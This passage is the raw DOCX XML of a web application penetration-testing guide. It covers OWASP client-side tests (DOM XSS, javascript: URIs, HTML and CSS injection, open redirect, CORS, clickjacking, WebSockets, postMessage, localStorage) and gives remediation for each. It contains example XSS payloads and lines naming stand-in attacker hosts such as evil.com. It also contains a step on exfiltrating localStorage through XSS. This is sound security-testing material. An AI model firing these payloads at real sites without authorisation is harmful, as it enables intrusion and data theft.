        <w:t xml:space="preserve">Craft a payload in the URL fragment (which is never sent to the server, so it must be tested purely client-side) and confirm execution.</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https://target.com/page.html#&lt;img src=x onerror=alert(1)&gt;</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Avoid dangerous sinks (innerHTML, document.write, eval) for untrusted data; use safe DOM APIs (textContent, createElement) instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply a strict Content-Security-Policy to limit the impact of any missed instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-002  —  Testing for JavaScript Execution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the application allows injection of executable JavaScript via non-standard vectors such as the javascript: URI scheme.</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Identify any functionality accepting a user-supplied URL (redirects, links, image sources).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to supply a javascript: URI in place of a standard http(s) URL and observe whether it executes when interacted with.</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www.victim.com/?redirect=javascript:alert(1)</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Validate and allow-list the URI scheme (http/https only) for any user-supplied URL used in a redirect or link context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-003  —  Testing for HTML Injection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user input is rendered as raw HTML, allowing structural page manipulation even without full script execution (e.g., forged forms, fake login prompts).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Inject basic HTML tags into every reflected/stored input point and observe if they render as markup rather than literal text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If confirmed, escalate to an event-handler-based payload to test for script execution as well.</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?user=&lt;img src='aaa' onerror=alert(1)&gt;</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Apply HTML-entity encoding to all user-controlled output rendered into an HTML context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-004  —  Testing for Client Side URL Redirect</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a redirect parameter can be manipulated to send the victim to an attacker-controlled (open redirect) destination.</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Identify all redirect-related parameters (redirect, next, return_url, continue).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Substitute an external, attacker-controlled domain as the redirect target and confirm the browser is redirected there.</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?redirect=www.fake-target.site</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Validate redirect targets against an allow-list of internal, relative paths only, or require an explicit signed/mapped token rather than a raw URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-005  —  Testing for CSS Injection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user input reaches a CSS context in a way that allows execution of legacy CSS-based script vectors (largely historical, browser-dependent).</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Identify any functionality allowing user-controlled CSS or style attributes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test legacy CSS-expression/link vectors relevant to older browser engines, while noting most modern browsers have removed these behaviors.</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www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">www.victim.com/#red;-:expression(alert(1));</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Sanitize/validate any user-controlled style content; avoid allowing raw CSS injection into the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rely on modern browser defaults, which have largely removed these legacy CSS-script vectors, but do not depend on this alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-006  —  Testing for Client Side Resource Manipulation</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an external resource reference (e.g., a script source) can be manipulated by an attacker to load malicious content from an untrusted origin.</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Identify any client-side code that constructs a resource URL (script src, iframe src) partly from user-controlled input (e.g., a URL fragment).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Substitute an attacker-controlled resource URL and confirm it is loaded by the page.</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www.victim.com/#http://evil.com/js.js</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Never construct resource-loading URLs from untrusted input; use a fixed, allow-listed set of resource origins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-007  —  Test Cross Origin Resource Sharing</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the application's CORS configuration is overly permissive, allowing untrusted origins to read sensitive cross-origin responses.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Send a request with an arbitrary Origin header and inspect the Access-Control-Allow-Origin response header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether the server reflects any origin back verbatim, and whether Access-Control-Allow-Credentials: true is combined with an overly broad allowed-origin policy (a particularly dangerous combination).</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curl -H "Origin: https://evil.test" -I https://target.com/api/data</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Explicitly allow-list only trusted origins in Access-Control-Allow-Origin; never reflect arbitrary origins, especially alongside credentialed requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid Access-Control-Allow-Origin: * for any endpoint returning sensitive or session-specific data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-008  —  Testing for Cross Site Flashing</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FlashBang, Flare, Flasm, SWFScan, SWF Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether legacy Flash (SWF) content used by the application is vulnerable to decompilation, unsafe method exposure, or malicious SWF inclusion.</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Identify any SWF content still served by the application (Flash is deprecated and increasingly rare).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decompile the SWF and review for undefined/unsafe ActionScript methods and hardcoded sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether an external SWF file can be loaded via a manipulated parameter.</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www.victim.com/file.swf?lang=http://evil.test/malicious.swf</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Remove Flash/SWF content entirely; it is deprecated and no longer supported by modern browsers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If legacy support is unavoidable, strictly validate any parameter that influences loaded external resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-009  —  Testing for Clickjacking</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custom PoC HTML page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the target page can be loaded within an iframe on an attacker-controlled page, enabling UI-redress (clickjacking) attacks.</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Create a simple HTML page containing an iframe pointing to the target page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Load the PoC page in a browser and observe whether the target content renders inside the frame (rather than being blocked by frame-busting or header protections).</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&lt;iframe src="https://target.com/account/settings" width="800" height="600"&gt;&lt;/iframe&gt;</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Set X-Frame-Options: DENY or SAMEORIGIN, and/or a Content-Security-Policy: frame-ancestors directive, on all pages that should never be framed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-010  —  Testing WebSockets</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Chrome DevTools, OWASP ZAP, WebSocket client tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether WebSocket communication (ws:// or wss://) properly enforces origin checking, confidentiality/integrity, authentication, authorization, and input sanitization.</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Identify WebSocket usage by inspecting the Network tab for ws:// or wss:// connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the WebSocket handshake validates the Origin header server-side to prevent cross-site WebSocket hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether unauthenticated or under-authorized clients can establish or interact with the WebSocket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzz WebSocket message payloads the same way HTTP parameters are fuzzed, for injection and input-validation issues.</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(Burp Proxy) WebSockets history tab — intercept and replay/modify WebSocket frames</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Validate the Origin header on the WebSocket handshake and reject unexpected origins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Always use wss:// (TLS) in production; apply the same authentication/authorization checks used elsewhere in the application to WebSocket messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-011  —  Test Web Messaging</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Burp Proxy, OWASP ZAP, browser DevTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the application's use of the postMessage Web Messaging API properly validates message origin and content.</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Review JavaScript source for postMessage senders and message event listeners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether the receiving listener validates event.origin before trusting/acting on the received data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to send a forged postMessage from an attacker-controlled page and observe whether the target application processes it as trusted.</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(Custom PoC page) targetWindow.postMessage('malicious-data','*')  -- observe if the target processes it without origin validation</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Always validate event.origin against an explicit allow-list within any postMessage listener before trusting the received data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid using a wildcard (*) targetOrigin when sending sensitive data via postMessage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-012  —  Test Local Storage</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="2"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:color="EEEEEE" w:sz="2"/>
          <w:insideV w:val="none"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="8100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="595959"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Chrome DevTools, Firebug, Burp Proxy, OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the application stores sensitive data in browser localStorage/sessionStorage, and whether that storage is exposed to script injection (XSS) impact escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect browser storage (Application tab in DevTools) after normal application use for sensitive data (tokens, PII).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If any XSS finding exists elsewhere, demonstrate the ability to read and exfiltrate localStorage contents via the injected script, since localStorage is directly accessible to any script running on the page (unlike HttpOnly cookies).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Example Commands / Payloads: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00"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E7A34"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid storing sensitive tokens or PII in localStorage/sessionStorage; prefer HttpOnly cookies for session tokens, which are inaccessible to JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediate any XSS vulnerability, since it directly compounds the risk of client-side storage exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId31"/>
          <w:footerReference w:type="default" r:id="rId32"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A: OWASP Risk Rating Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
